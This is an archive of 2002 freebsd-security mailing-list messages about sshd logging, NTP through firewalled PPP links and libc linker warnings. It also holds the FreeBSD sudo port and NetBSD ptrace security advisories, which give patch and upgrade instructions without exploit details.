LogLevel INFO

I then tried:

# Logging
SyslogFacility AUTH
LogLevel VERBOSE

I then tried:

# Logging
SyslogFacility AUTH
LogLevel DEBUG

Not sure what it is i'm missing. I've HUP'ed every service, and read what I could, but it still fails to log.

Is this not a feature? or am I just missing something simple?

--emacs
From owner-freebsd-security Tue Jan 15 9:53:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from squall.waterspout.com (squall.waterspout.com [208.13.56.12]) by hub.freebsd.org (Postfix) with ESMTP id BD6D337B405 for ; Tue, 15 Jan 2002 09:53:08 -0800 (PST) Received: by squall.waterspout.com (Postfix, from userid 1050) id 5BF709B19; Tue, 15 Jan 2002 12:52:57 -0500 (EST) Date: Tue, 15 Jan 2002 12:52:57 -0500 From: Will Andrews To: admin Cc: freebsd-security@FreeBSD.ORG Subject: Re: Openssh btwn linux/bsd.. Message-ID: <20020115125257.C73815@squall.waterspout.com> Reply-To: Will Andrews Mail-Followup-To: admin , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.22.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Tue, Jan 15, 2002 at 08:48:07AM -0600, admin wrote:
> I ran into an issue (from only one slackware box) with S/Key
> authentication, wondered if anyone else sees this. The owner of the other
> box sent the question to openssh and the following is the answer..

# Uncomment to disable s/key passwords
ChallengeResponseAuthentication no

Use this in sshd_config if you do not use s/key.

--
wca
From owner-freebsd-security Tue Jan 15 10:39:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id DA6C537B405 for ; Tue, 15 Jan 2002 10:39:43 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.11.4/8.11.4) id g0FIdex59177; Tue, 15 Jan 2002 13:39:40 -0500 (EST) (envelope-from wollman) Date: Tue, 15 Jan 2002 13:39:40 -0500 (EST) From: Garrett Wollman Message-Id: <200201151839.g0FIdex59177@khavrinen.lcs.mit.edu> To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: options TCP_DROP_SYNFIN In-Reply-To: References: <20011217073102.GA94480@noname> <20011217185456.A34365@raven.robbins.dropbear.id.au> <200112171803.fBHI3kA35513@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

< said:

> Garrett Wollman writes:
>> [...] DES and I have discussed a more appropriate behavior for
>> this option which does not violate the TCP standard.

> ...but we never arrived at a definite conclusion.

I thought we had. Must have crossed wires or something.

-GAWollman
From owner-freebsd-security Tue Jan 15 14:10:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from falcon.prod.itd.earthlink.net (falcon.mail.pas.earthlink.net [207.217.120.74]) by hub.freebsd.org (Postfix) with ESMTP id 1C7D337B402 for ; Tue, 15 Jan 2002 14:10:22 -0800 (PST) Received: from dialup-209.245.128.158.dial1.sanjose1.level3.net ([209.245.128.158] helo=blossom.cjclark.org) by falcon.prod.itd.earthlink.net with esmtp (Exim 3.33 #1) id 16QbmV-0002ht-00; Tue, 15 Jan 2002 14:10:12 -0800 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.3) id g0FM9b432429; Tue, 15 Jan 2002 14:09:37 -0800 (PST) (envelope-from cjc) Date: Tue, 15 Jan 2002 14:09:28 -0800 From: "Crist J . Clark" To: admin Cc: freebsd-security@FreeBSD.ORG Subject: Re: Logging ssh?? Message-ID: <20020115140928.B31328@blossom.cjclark.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from admin@crimelords.org on Tue, Jan 15, 2002 at 10:49:23AM -0600 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Tue, Jan 15, 2002 at 10:49:23AM -0600, admin wrote:
> I'm trying to get failed log-in attempts setup to go to my syslog or
> messages file (/var/log) and have had zero success. Openssh 2.9 on
> freeBSD4.4 stable
>
> I must be missing something in the syslog.conf, so i put in the line
>
> *.*,cron.none	/var/log/syslog
>
> no spaces, only tabs...then 'touch /var/log/syslog'

Always post the _whole_ syslog.conf(5). Location in the file may be important. For example, if you stuck this at the bottom of the default syslog.conf(5) distributed with FreeBSD, it wouldn't work.

> Not sure what it is i'm missing. I've HUP'ed every service, and read what
> I could, but it still fails to log.

You HUPed syslogd(8) too, right? You could try running it in debug mode (-d) to see what is up.

> Is this not a feature? or am I just
> missing something simple?

With relation to my first comment, understand what "blocks" are in the syslog.conf(5) manpage and make sure your added line is in the right place.
--
"It's always funny until someone gets hurt. Then it's hilarious."

Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org
From owner-freebsd-security Tue Jan 15 20:37:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27]) by hub.freebsd.org (Postfix) with ESMTP id C3BD737B405 for ; Tue, 15 Jan 2002 20:37:14 -0800 (PST) Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1]) by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id PAA29274 for ; Wed, 16 Jan 2002 15:37:13 +1100 (EDT) Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au (PMDF V5.2-32 #37645) with ESMTP id <01KD57128C685IJCVN@cim.alcatel.com.au> for freebsd-security@freebsd.org; Wed, 16 Jan 2002 15:37:32 +1100 Received: (from jeremyp@localhost) by gsmx07.alcatel.com.au (8.11.6/8.11.6) id g0G4b8574244 for freebsd-security@freebsd.org; Wed, 16 Jan 2002 15:37:08 +1100 Content-return: prohibited Date: Wed, 16 Jan 2002 15:37:08 +1100
From: Peter Jeremy Subject: Firewalls + NTP + dialup problems To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@freebsd.org Message-id: <20020116153707.C72285@gsmx07.alcatel.com.au> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I'm having a problem running NTP over a dialup link between two hosts with fairly strict packet filtering. Both machines are running 4.4-STABLE from mid-December (just before the 4.5 freeze).

+------+       +------+       +------+       +------+
|      | enet  |      |  ppp  |      | enet  |      |
| net1 |-------|host1 |-------|host2 |-------| net2 |
|      |       |      |       |      |       |      |
+------+       +------+       +------+       +------+

"ppp" is a dial-on-demand link that is initiated by host1 using ppp(8). "enet" are the ethernet links to the LANs (net1 and net2). "host2.ppp" refers to the IP address of the PPP interface on host2 etc. ppp(8) on host2 is configured using "Method 2" from the man page (ppp is started using getty's "pp" capability).

Both hosts have a mixture of ipfw and PPP filter rules intended to restrict access from host2 and net2 to host1 and net1. All four sets of rules restrict PPP traffic to host1.ppp<->host2.ppp. Both hosts have each other listed as an NTP peer (along with other machines).

The problem I've got is that when host2 reboots, there is no PPP connection and therefore host2.ppp doesn't exist (ppp ifconfig's it into existence when it gets an incoming call from host1). This means that ntpd only binds to host2.enet and host2.lo0. NTP packets from host2 to host1 have a source address of host2.enet - which is blocked by the firewall rules.

So far, I've thought of the following:
1) Allow the address host2.enet on the PPP link. I don't like (or want to implement) this.
2) Make ntpd notice when host2.ppp is created and bind to it. ntpd(8) doesn't appear to have any suitable signals trapped and the code to create and bind sockets only appears to be invoked during initialisation.
3) Have host2.ppp always exist so ntpd can bind to it when it starts. I can't see any obvious way to achieve this. "ifconfig tun0" will create the address, but ppp then whinges and will delete the address when the link drops.

Can anyone else offer any suggestions?

Peter
From owner-freebsd-security Tue Jan 15 23:56:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from hitit.bimel.com.tr (hitit.bimel.com.tr [212.175.97.140]) by hub.freebsd.org (Postfix) with ESMTP id ED90437B41C for ; Tue, 15 Jan 2002 23:56:25 -0800 (PST) Received: (from root@localhost) by hitit.bimel.com.tr (8.11.6/8.11.6) id g0G7wM738849 for freebsd-security@freebsd.org; Wed, 16 Jan 2002 09:58:22 +0200 (EET) (envelope-from simsek@bimel.com.tr) Received: from localhost (simsek@localhost) by hitit.bimel.com.tr (8.11.6/8.11.6av) with ESMTP id g0G7wGS38839 for ; Wed, 16 Jan 2002 09:58:21 +0200 (EET) (envelope-from simsek@bimel.com.tr) X-Authentication-Warning: hitit.bimel.com.tr: simsek owned process doing -bs Date: Wed, 16 Jan 2002 09:58:16 +0200 (EET) From: Baris Simsek To: Subject: newsyslog problem Message-ID: <20020116095136.I37632-100000@hitit.bimel.com.tr> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

hi,

i know, this is not interested in this list directly.

When newsyslog rotates my /var/log/messages file, named stops. Here is related line in /etc/newsyslog.conf:

/var/log/messages root.wheel 640 7 12000 * Z

if named doesn't work, i check it by 'cat /var/log/messages'.
There is only this line:

Nov 6 10:55:00 srv3 newsyslog[31917]: logfile turned over

I understand that, when log file turns, named stops. so what is problem?

thx... best regards,

--
- barI$ -
From owner-freebsd-security Wed Jan 16 3: 9:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from draco.over-yonder.net (draco.over-yonder.net [198.78.58.61]) by hub.freebsd.org (Postfix) with ESMTP id 0A63737B404; Wed, 16 Jan 2002 03:09:14 -0800 (PST) Received: by draco.over-yonder.net (Postfix, from userid 100) id E1899FC5; Wed, 16 Jan 2002 05:09:12 -0600 (CST) Date: Wed, 16 Jan 2002 05:09:12 -0600 From: "Matthew D. Fuller" To: Kris Kennaway Cc: Alfred Perlstein , Buliwyf McGraw , freebsd-security@FreeBSD.ORG Subject: Re: gets() is unsafe Message-ID: <20020116050912.P23043@over-yonder.net> References: <20020114151955.I26067@elvis.mu.org> <20020115082216.A792@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5-fullermd.1i In-Reply-To: <20020115082216.A792@citusc17.usc.edu>; from kris@FreeBSD.ORG on Tue, Jan 15, 2002 at 08:22:16AM -0800 X-Editor: vi X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Tue, Jan 15, 2002 at 08:22:16AM -0800 I heard the voice of
Kris Kennaway, and lo! it spake thus:
> > * Buliwyf McGraw [020114 14:49] wrote:
> > >
> > > Hi... i was installing several applications (php,xmms,etc) on my
> > > FreeBSD 4.4 server and i got the next message a lot of times when
> > > i was compiling:
            ^^^^^^^^^
> > > /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely;
> > > consider using mkstemp()
> > > /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely;
> > > consider using mkstemp()
[...]
> No, this is a FAQ; it's a bug in the linker which causes it to trip
> every single _warn_references() in the library when it links to libc,
> regardless of whether the program actually uses the functions in
> question.

I think it's an even better FAQ: Why, when he's compiling, is it linking against a compat/libc?

--
Matthew Fuller (MF4839)     | fullermd@over-yonder.net
Unix Systems Administrator  | fullermd@futuresouth.com
Specializing in FreeBSD     | http://www.over-yonder.net/

"The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet"
From owner-freebsd-security Wed Jan 16 7:46:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mafalda.univalle.edu.co (mafalda.univalle.edu.co [200.68.158.10]) by hub.freebsd.org (Postfix) with ESMTP id AE2C037B417 for ; Wed, 16 Jan 2002 07:46:31 -0800 (PST) Received: from libertad.univalle.edu.co (libertad.univalle.edu.co [192.168.18.91]) by mafalda.univalle.edu.co (8.12.1/8.12.1) with ESMTP id g0GDmol7013613 for ; Wed, 16 Jan 2002 08:48:51 -0500 (GMT) Received: from libertad.univalle.edu.co (buliwyf@localhost.univalle.edu.co [127.0.0.1]) by libertad.univalle.edu.co (8.12.1/8.12.1) with ESMTP id g0GDueJI060223 for ; Wed, 16 Jan 2002 08:56:40 -0500 (COT) Received: from localhost (buliwyf@localhost) by libertad.univalle.edu.co (8.12.1/8.12.1/Submit) with ESMTP id g0GDuegA060220 for ; Wed, 16 Jan 2002 08:56:40 -0500 (COT) Date: Wed, 16 Jan 2002 08:56:40 -0500 (COT) From: Buliwyf McGraw To: freebsd-security@FreeBSD.ORG Subject: Re: gets() is unsafe (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Kris Kennaway, and lo! it spake thus:
> > * Buliwyf McGraw [020114 14:49] wrote:
> > >
> > > Hi... i was installing several applications (php,xmms,etc) on my
> > > FreeBSD 4.4 server and i got the next message a lot of times when
> > > i was compiling:
            ^^^^^^^^^
> > > /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely;
> > > consider using mkstemp()
> > > /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely;
> > > consider using mkstemp()
[...]

> > No, this is a FAQ; it's a bug in the linker which causes it to trip
> > every single _warn_references() in the library when it links to libc,
> > regardless of whether the program actually uses the functions in
> > question.

> I think it's an even better FAQ: Why, when he's compiling, is it linking
> against a compat/libc?

Ok... i have to say that i am not an expert on FreeBSD, just a new admin... I installed FreeBSD 4.4 on my box (in some way, "everything by default")... and then i started to install some applications (apache,php,etc), not with the /stand/sysinstall utility, but in the traditional way:
- Download the *.tar.gz
- Uncompress, configure, make, make install

I expected no problems... but as you can see, the warning messages give an "insecure" sensation.
I want to do something to avoid that messages when i try to compile a GNU application.
Thanks for your comments and help.
=======================================================================
Buliwyf McGraw
Administrator of the Libertad Server
Information Services Center
Universidad del Valle
=======================================================================
From owner-freebsd-security Wed Jan 16 15:15:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8FCFE37B41A; Wed, 16 Jan 2002 15:15:33 -0800 (PST) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g0GNFX257696; Wed, 16 Jan 2002 15:15:33 -0800 (PST) (envelope-from security-advisories@freebsd.org) Date: Wed, 16 Jan 2002 15:15:33 -0800 (PST) Message-Id: <200201162315.g0GNFX257696@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory FreeBSD-SA-02:06.sudo Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

=============================================================================
FreeBSD-SA-02:06                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          sudo port may enable local privilege escalation

Category:       ports
Module:         sudo
Announced:      2002-01-16
Credits:        Sebastian Krahmer
Affects:        Ports collection prior to the correction date
Corrected:      2002-01-15 02:56:33 UTC
FreeBSD only:   NO

I.   Background

Sudo is a program designed to allow a sysadmin to give limited root privileges to users and log root activity.

II.  Problem Description

The sudo port, versions prior to sudo-1.6.4.1, contains a vulnerability that may allow a local user to obtain superuser privileges. If a user who has not been authorized by the system administrator (listed in the `sudoers' file) attempts to use sudo, sudo will send an email alert. When it does so, it invokes the system mailer with superuser privileges, and with most of the user's environment intact.

The sudo port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 6000 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.4 contains this problem since it was discovered after the release.

FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports.

III. Impact

If the system mailer's behavior can be influenced by the settings of environmental variables, then an attacker may obtain superuser privileges. There is at least one mailer (postfix) that can be influenced in this fashion.

IV.  Workaround

1) Deinstall the sudo port/package if you have it installed.

V.   Solution

1) Upgrade your entire ports collection and rebuild the port.

2) Deinstall the old package and install a new package dated after the correction date, obtained from the following directories:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/security/sudo-1.6.4.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/security/sudo-1.6.4.1.tgz

[alpha]
Packages are not automatically generated for the alpha architecture at this time due to lack of build resources.

NOTE: It may be several days before updated packages are available.

3) Download a new port skeleton for the sudo port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz

VI.  Correction details

The following list contains the revision numbers of each file that was corrected in the FreeBSD ports collection.

Path                                                             Revision
-------------------------------------------------------------------------
ports/security/sudo/Makefile                                         1.43
ports/security/sudo/distinfo                                         1.26
-------------------------------------------------------------------------
From owner-freebsd-security Wed Jan 16 16: 7:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 1983F37B400 for ; Wed, 16 Jan 2002 16:07:37 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.6/8.11.4) id g0H05p005962; Wed, 16 Jan 2002 16:05:51 -0800 (PST) (envelope-from kris) Date: Wed, 16 Jan 2002 16:05:50 -0800 From: Kris Kennaway To: Buliwyf McGraw Cc: freebsd-security@FreeBSD.ORG Subject: Re: gets() is unsafe (fwd) Message-ID: <20020116160550.A5927@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="xHFwDpU9dbj6ez1V" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from buliwyf@libertad.univalle.edu.co on Wed, Jan 16, 2002 at
08:56:40AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org
--xHFwDpU9dbj6ez1V Content-Type: text/plain; charset=us-ascii Content-Disposition: inline

On Wed, Jan 16, 2002 at 08:56:40AM -0500, Buliwyf McGraw wrote:

> > > No, this is a FAQ; it's a bug in the linker which causes it to trip
> > > every single _warn_references() in the library when it links to libc,
> > > regardless of whether the program actually uses the functions in
> > > question.

> I expected no problems... but as you can see, the warning messages give
> an "insecure" sensation.
> I want to do something to avoid that messages when i try to compile a GNU
> application.
> Thanks for your comments and help.

I've already told you that this situation is a bug in the toolchain and not a security problem.

Kris
--xHFwDpU9dbj6ez1V--
From owner-freebsd-security Wed Jan 16 16:19:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 28F2837B400 for ; Wed, 16 Jan 2002 16:19:17 -0800 (PST) Received: from velvet.zaraska.dhs.org (velvet.zaraska.dhs.org [192.168.11.2]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id 4E9FA1DA7; Thu, 17 Jan 2002 01:16:18 +0100 (CET) Received: from velvet.zaraska.dhs.org (velvet.zaraska.dhs.org [127.0.0.1]) by velvet.zaraska.dhs.org (8.11.2/8.11.2) with SMTP id g0H0G4s01259; Thu, 17 Jan
2002 01:16:04 +0100 Date: Thu, 17 Jan 2002 01:16:04 +0100 From: Krzysztof Zaraska To: "Buliwyf McGraw" Cc: freebsd-security@freebsd.org Subject: Re: gets() is unsafe (fwd) Message-Id: <20020117011604.6e5291da.kzaraska@student.uci.agh.edu.pl> In-Reply-To: References: Organization: University Of Mining And Metallurgy X-Mailer: Sylpheed version 0.6.2 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 16 Jan 2002 08:56:40 -0500 (COT) Buliwyf McGraw wrote: > Kris Kennaway, and lo! it spake thus: > > > * Buliwyf McGraw [020114 14:49] wrote: > > > > > > > > Hi... i was installing several applications (php,xmms,etc) on my > > > > FreeBSD 4.4 server and i got the next message a lot of times when > > > > i was compiling: > ^^^^^^^^^ > > > > /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely; > > > > consider using mkstemp() > > > > /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely; > > > > consider using mkstemp() > [...] > > > > No, this is a FAQ; it's a bug in the linker which causes it to trip > > > every single _warn_references() in the library when it links to libc, > > > regardless of whether the program actually uses the functions in > > > question. > > > I think it's an even better FAQ: Why, when he's compiling, is it linking > > against a compat/libc? > > Ok... i have to say that i am not an expert on FreeBSD, just a new > admin... I installed FreeBSD 4.4 on my box (in some way, "everything by > default")... and then i started to install some applications (apache,php,etc), > not with the /stand/sysinstall utility, but in the traditional way: > - Download the *.tar.gz > - Uncompress, configure, make, make install > > I expected no problems... 
but as you can see, the warning messages give > an "insecure" sensation. > I want to do something to avoid that messages when i try to compile a GNU > application. > Thanks for your comments and help.

OK, I'm not an expert here either, but anyhow... I've been doing some FreeBSD porting/programming recently and I found that these (or similar) warnings simply pop up when you use an insecure function in your code. Try compiling a 'Hello World'-like application that uses mktemp() or gets(). You'll get a warning, while the same code compiles cleanly on Linux. So it seems that such warnings are issued every time the linker hits a function that is 'tagged' as insecure. I guess this is an attempt to help programmers in secure programming :)

I guess some of your programs make use of these insecure functions, so the compiler warns you about that. Of course the fact that someone used an insecure function does not necessarily mean that the program is automatically insecure; everything depends on how it is used.

Besides, if you are installing standard applications, why don't you go to /usr/ports and start from there? E.g.

    cd /usr/ports/www/apache13 && make install

will install Apache for you. You'll get a version already patched for FreeBSD.
Krzysztof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 16 18:10:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id CB35837B419 for ; Wed, 16 Jan 2002 18:10:36 -0800 (PST) Received: (from root@localhost) by cage.simianscience.com (8.11.6/8.11.6) id g0H2AZf19823 for security@freebsd.org; Wed, 16 Jan 2002 21:10:35 -0500 (EST) (envelope-from mike@sentex.net) Received: from house.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.11.6/8.11.6av) with ESMTP id g0H2AV319815 for ; Wed, 16 Jan 2002 21:10:32 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020116211004.0269d600@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 16 Jan 2002 21:11:06 -0500 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: NetBSD Security Advisory 2002-001 Close-on-exec, SUID and ptrace(2) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There is mention of other BSDs as well in the advisory below. Was/is this an old issue for FreeBSD or one that is currently relevant ? 
---Mike >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Date: Wed, 16 Jan 2002 13:04:32 -0500 >From: NetBSD Security Officer >To: bugtraq@securityfocus.com >Subject: NetBSD Security Advisory 2002-001 Close-on-exec, SUID and ptrace(2) >Reply-To: NetBSD Security Officer >User-Agent: Mutt/1.2.5.1i >Organisation: The NetBSD Foundation, Inc. >X-Virus-Scanned: by AMaViS perl-10 > > >-----BEGIN PGP SIGNED MESSAGE----- > > > NetBSD Security Advisory 2002-001 > ================================= > >Topic: Close-on-exec, SUID and ptrace(2) > >Version: NetBSD-current: prior to January 14, 2002 > NetBSD-1.5.*: affected up to and including 1.5.2 > NetBSD-1.4.*: affected up to and including 1.4.3 > >Severity: local root privilege compromise > >Fixed: NetBSD-current: January 14, 2002 > NetBSD-1.5 branch: January 14, 2002 > NetBSD-1.4 branch: January 14, 2002 > > >Abstract >======== > >A process could exec a setuid binary, while gaining ptrace control >over it for a short period before the process was activated. The >ptrace controller process could then modify the address space of the >controlled process and abuse its elevated privileges. > >Technical Details >================= > >The opportunity for abuse is similar to the issues in NetBSD-SA2001-009, >though the cause is different. A race condition existed which allowed >bypassing of the usual restrictions against using ptrace on setugid >processes. > >Since there is no known public exploit of this issue, and it is known to >affect other BSDs it would be a public disservice to provide further >insight at this time. > >A patch is being included for procfs which can be exploited in a similar >fashion. > >Note that the ptrace portion of this advisory affects all kernels, not >only kernels with particular options, such as procfs. 
> >Solutions and Workarounds >========================= > >The only workaround available is to disable all logins by untrusted >users. The race should still be patched, since it would allow elevation >to root privileges if some other vulnerability allowed a non-privileged >account to be compromised. > >Since all recent NetBSD versions are affected, anyone who grants or has >granted >user accounts to untrusted users on their systems should apply the patch for >this issue immediately. > >While initial tests against earlier versions such as NetBSD-1.3.x were >unsuccessful, it is still expected that this issue would apply to these older >versions as well. It is strongly recommended that systems running >NetBSD-1.3.x and earlier be upgraded to a more recent release for many >security and performance reasons. > >The following instructions describe how to upgrade your kernel by >updating your source tree or patching it. > >* NetBSD-current: > > Systems running NetBSD-current dated from before 2002-01-14 > should be upgraded to NetBSD-current dated 2002-01-15 or later. > > The following files need to be updated from the > netbsd-current CVS branch (aka HEAD): > sys/kern/kern_exec.c > sys/kern/sys_process.c > sys/sys/proc.h > sys/miscfs/procfs/procfs_ctl.c > sys/miscfs/procfs/procfs_mem.c > sys/miscfs/procfs/procfs_regs.c > sys/miscfs/procfs/procfs_vnops.c > > To update your kernel sources from CVS: > # cd src > # cvs update -d -P sys/kern/kern_exec.c > # cvs update -d -P sys/kern/sys_process.c > # cvs update -d -P sys/sys/proc.h > # cvs update -d -P sys/miscfs/procfs/procfs_ctl.c > # cvs update -d -P sys/miscfs/procfs/procfs_mem.c > # cvs update -d -P sys/miscfs/procfs/procfs_regs.c > # cvs update -d -P sys/miscfs/procfs/procfs_vnops.c > > Then build and install a new kernel. 
If you are not familiar > with this process, documentation is available at: > > >http://www.netbsd.org/Documentation/kernel/#how_to_build_a_kernel > >* NetBSD 1.5, 1.5.1, 1.5.2: > > Systems running NetBSD 1.5-branch sources dated from > before 2002-01-14 should be upgraded from NetBSD 1.5-branch > sources dated 2002-01-15 or later. > > The following files need to be updated from the > netbsd-1-5 CVS branch: > sys/kern/kern_exec.c > sys/kern/sys_process.c > sys/sys/proc.h > sys/miscfs/procfs/procfs_ctl.c > sys/miscfs/procfs/procfs_mem.c > sys/miscfs/procfs/procfs_regs.c > > To update your existing checkout of 1.5-branch kernel sources > from CVS: > > # cd src > # cvs update -d -P sys/kern/kern_exec.c > # cvs update -d -P sys/kern/sys_process.c > # cvs update -d -P sys/sys/proc.h > # cvs update -d -P sys/miscfs/procfs/procfs_ctl.c > # cvs update -d -P sys/miscfs/procfs/procfs_mem.c > # cvs update -d -P sys/miscfs/procfs/procfs_regs.c > # cvs update -d -P sys/miscfs/procfs/procfs_vnops.c > > Then build and install a new kernel. If you are not familiar > with this process, documentation is available at: > > >http://www.netbsd.org/Documentation/kernel/#how_to_build_a_kernel > > Alternatively, apply the following patch (with potential offset > differences): > > >ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2002-001-ptrace-1.5.patch > > To patch: > > # cd src > # patch < /path/to/SA2002-001-ptrace-1.5.patch > > Then build and install a new kernel. If you are not familiar > with this process, documentation is available at: > > >http://www.netbsd.org/Documentation/kernel/#how_to_build_a_kernel > > >* NetBSD 1.4, 1.4.1, 1.4.2, 1.4.3: > > Apply the following patch (with potential offset differences): > > >ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2002-001-ptrace-1.4.patch > > To patch: > > # cd src > # patch < /path/to/SA2002-001-ptrace-1.4.patch > > Then build and install a new kernel. 
